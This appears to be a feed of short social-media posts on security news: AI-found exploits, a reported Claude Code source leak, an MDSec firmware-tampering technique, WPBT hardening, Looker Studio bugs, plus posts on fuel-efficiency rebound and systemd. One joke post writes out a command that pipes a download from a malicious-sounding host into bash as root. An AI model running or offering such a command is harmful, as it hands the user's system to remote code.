Why do you have such emnity against have against microphone wind shields?

We Need to Talk About the IPv8 Draft The Good, The Bad, and the Heinous

Interesting critical analysis of IPv8 draft...

shitwolfymakes.substack.com/p/we-need-to...

LLM-found vulnerabilities don't need panic, they need faster patching. Equip your developers with AI tools for code comprehension, triage, and testing. Defenders have full source access — LLMs amplify that advantage. The bottleneck isn't technology, it's adoption.

secwest.net/ai-triage

Rust is the one true way to write performant, safe, code - unlike those archaic, dangerous, and inefficient primitive languages. Your heresy is noted.

MAD Bugs: Claude Wrote a Full FreeBSD Remote Kernel RCE with Root Shell (CVE-2026-4747) To our knowledge, this is the first remote kernel exploit both discovered and exploited by an AI.

I watched LLMs write full exploit chains years ago. The amazement fades once you hit context limits and have to steer the model through every hard corner. The industry is full of people who just got here and are still in the amazement phase. That's the gap worth watching.

GitHub - nirholas/claude-code: Claude Code is an agentic coding tool that lives in your terminal, understands your codebase, and helps you code faster by executing routine tasks, explaining complex co... Claude Code is an agentic coding tool that lives in your terminal, understands your codebase, and helps you code faster by executing routine tasks, explaining complex code, and handling git workflo...

Anthropic accidentally leaked Claude Code's source code. Researcher Chaofan Shou found a .map file in the npm package linking to the full, unobfuscated TypeScript files in an R2 bucket. The internet is now rapidly downloading and analyzing the logic behind the CLI tool.

github.com/nirholas/cla...

Disabling Security Features in a Locked BIOS - MDSec Overview This post explores how modifying a Dell UEFI firmware image at the flash level can fundamentally undermine platform security without leaving visible traces in the firmware interface. By direc...

MDSec shows how to patch Dell UEFI firmware offline to disable pre-boot DMA protection while the BIOS UI still shows it enabled. TPM PCRs don't catch the NVRAM change, so BitLocker boots fine. Patch survives official BIOS updates. Then PCILeech gets you SYSTEM. Measured boot gap worth studying.

This could open up a lot longer contexts on phones and local GPU LLMs. One early implementation experiment on a 16g 5060Ti increased context from 8k to 40k

github.com/tonbistudio/...

Google's TurboQuant compresses KV cache to 3 bits with no accuracy loss — 6x memory reduction, 8x attention speedup on H100. No official code yet but llama.cpp and MLX integration is underway. Good technical breakdown with pseudocode here: turboquant.net

Default Outbound Access in Azure - Azure Virtual Network Learn about default outbound access in Azure.

Azure: default outbound access going away for subnets April 1st. New subnets private by default. Old outbound behaviour still available by explicit config, or deploy a NAT Gateway (~$36/mo) for better architecture. Pre-April subnets grandfathered. Check your deploy scripts before they break.

Your UEFI firmware can drop a binary into Windows on every boot via Windows Platform Binary Table. OEMs use it for bloatware persistence. Attackers use it the same way. One reg key kills it:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v DisableWpbtExecution /d 1 /t REG_DWORD /f

i loved tribes.... good times.

Instagram to discontinue end-to-end encryption for DMs [Update: Meta's statement] Pulling the plug on privacy?

Meta spent seven years telling us they were working on true end-to-end encryption across all their various messaging apps... and finally rolled it out in 2024. And then less than three years later, they're shutting it off for Instagram? What?

www.androidpolice.com/instagram-is...

LeakyLooker: Hacking Google Cloud’s Data via Dangerous Looker Studio Vulnerabilities Tenable Research revealed "LeakyLooker," a set of nine novel cross-tenant vulnerabilities in Google Looker Studio. These flaws could have let attackers exfiltrate or modify data across Google services...

Nasty cross tenant bugs.

The character at a time blind data exfiltration is particularly clever here.

www.tenable.com/blog/leakylo...

Induced demand from highway expansion may matter as much as fuel cost rebound for VMT growth. Fuel efficiency improvements do save fuel — roughly 75-90% of the expected savings stick. A catchy name shouldn’t override the weight of evidence. 5/5

Small & Van Dender’s simultaneous-equations model found a long-run rebound of ~22%, shrinking to ~11% in recent data. As incomes rise, fuel cost becomes a trivial share of driving decisions. The effect is getting smaller over time, not larger. 4/5

The study uses 2009 survey data — one snapshot during a recession with volatile gas prices. People who expect to drive a lot buy efficient cars, reversing the causal arrow. OLS regression misses this endogeneity and inflates the rebound estimate. 3/5

Income, urban sprawl, road infrastructure, and total ownership cost drive VMT far more than fuel price. Fuel is ~15-25% of car costs. Depreciation, insurance, and financing dominate. VMT tracks income growth and suburban expansion more closely than efficiency gains. 2/5

The broader literature disagrees with this. The rebound effect is real but most rigorous estimates land at 10-25% — well short of the >100% threshold needed for actual Jevons’ paradox. A few reasons this study overshoots. 🧵1/5

Peer-reviewed study (n=12,000) finds that those who have been far as decided to use even go want to do look more like report a 23% increase in something, probably.

Friends don't let friends OpenClaw. You might as well just "sudo ( curl malware.ru | bash )" and save some time.

Seems more tragic than funny to me but we all have different ways of reacting to sad situations.

Our real only hope is AI. A few very experienced developers supercharged with modern LLM tools could be productive enough to broach that enormous gulf with intense effort if the motivation somehow struck them. But until / if that happens we are stuck with the ShitBorg.

GNOME has adamantly refused a modular back end. KDE has been a little more flexible... but the cost of building an alternative exceeds the benefit for any single actor. And elogind exists as a pressure release valve that keeps the situation tolerable enough that nobody is forced to solve it properly

It's a chicken and egg problem too. Unless one of the major distros defects from the systemd camp there isn't enough adoption to replace logind. Desktop Linux market share is so small that non-systemd users are rounding error. The people who could build an alternative are maintaining elogind/seatd..

There is no real specification for what a session manger should expose. Architectural coupling with logind and Gnome/KDE are probably the biggest hurdles.

Poettering and the other devs have been adamantly refusing to decouple logind and dbus from systemd PID1. They abandoned ConsoleKit.

Systemd is a giant blob of shit, slowly (and not so slowly) growing and engulfing all the functionality in the operating system in a huge monolithic turd.

It is the exact opposite of modular and creates this inescapable mother of all single points of failure and complexity.

Nearly all upstream projects ship with systemd unit files, if you use an alternative you have to spend a lot of time writing an maintaining init scripts. The old init file ecosystem has atrophied.

Dependency sprawl basically.

Then there is the networking stack. And timer units instead of crontabs.

Void, Artix, Gentoo, Alpine, Chimera... and others maintain independence but have to go through serious pain and non-trivial development to keep from being assimilated by systemd Borg...

Systemd has been one giant mis-step and the further we go down that path the more difficult it gets to unfuck...

The problem is the lock-in - desktop environments Gnome, KDE heavily depend on the logind D-bus API - elogind exists but it lags and needs patching.

systemd owns cgroup, and docker, podman et al wired in to systemd managing cgroup.

So many things coupled to libsystemd and udev. The systemd Borg...